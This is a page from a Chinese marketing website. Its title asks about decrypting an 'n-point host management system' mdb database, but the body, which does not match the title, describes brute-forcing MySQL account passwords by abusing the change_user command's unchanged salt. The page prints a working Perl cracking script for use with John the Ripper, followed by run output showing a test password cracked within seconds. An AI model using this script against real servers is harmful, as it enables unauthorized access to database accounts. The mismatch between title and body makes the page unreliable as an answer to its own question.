亿企邦
  • 首页
    •
  • 解决方案&服务
    •
  • 客户&案例
    •
  • 营销资讯
    •
  • 关于我们
    •
    15158846557 在线咨询 在线咨询
    亿企邦
    15158846557 在线咨询
    亿企邦

    快捷入口

    所在位置: 首页 > 营销资讯 > 网站运营 > n点主机管理系统 mdb数据库密文如何解密?

    n点主机管理系统 mdb数据库密文如何解密?

    时间:2024-01-05 04:18:01 | 来源:网站运营

    时间:2024-01-05 04:18:01 来源:网站运营

    n点主机管理系统 mdb数据库密文如何解密?:我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。

    方法如下:

    攻击者使用一个无特权帐号登录到 MySQL 服务器,mysql 有一个名为 change_user 的命令,该命令可用于在 mysql 会话中修改用户时的名字建议。因为这个命令执行非常快,因此可以很快速的用来破解 mysql 密码,而不是每次都重新连接到 mysql 服务器。

    是什么导致非常慢?

    因为使用 change_user 命令不会更改 SALT(这是一个弱点),而常规破解密码的方法每次连接时服务器都发送不同的 SALT。

    下面是一个 Perl 脚本使用了 John the Ripper 的方法来生成密码:

    测试的用户是 crackme 密码为 pass,只需数秒就可破解。

    (大约 20 秒钟可测试 10 万密码)

    测试脚本如下:

    use Net::MySQL;$|=1;my $mysql = Net::MySQL->new( hostname => '192.168.2.3', database => 'test', user => "user", password => "secret", debug => 0,);$crackuser = "crackme";while(<stdin>) {chomp;$currentpass = $_;$vv = join "/0", $crackuser, "/x14". Net::MySQL::Password->scramble( $currentpass, $mysql->{salt}, $mysql->{client_capabilities} ) . "/0";if ($mysql->_execute_command("/x11", $vv) ne undef) { print "[*] Cracked! --> $currentpass/n"; exit;}}下面是我这台机器上的执行结果:

    C:/Users/kingcope/Desktop>C:/Users/kingcope/Desktop/john179/run/jo

    hn --incremental --stdout=5 | perl mysqlcrack.pl Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH words: 24573 time: 0:00:00:04 w/s: 4916 current: rap words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3 words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429 words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141 words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2 [*] Cracked! --> pass words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs

    Session aborted

    祝你好运:)

    via grok

    关键词:数据,主机,管理,系统

    推荐文章

    新闻资讯

    整合营销 网络营销 网络推广 信息时代 建站知识 网站运营 电子商务 营销百科 公司新闻 行业动态 品牌营销

    推荐资讯

    74
    73
    25
    news

    微信公众号

    版权所有© 亿企邦 1997-2025 保留一切法律许可权利。

    为了最佳展示效果,本站不支持IE9及以下版本的浏览器,建议您使用谷歌Chrome浏览器。 点击下载Chrome浏览器
    关闭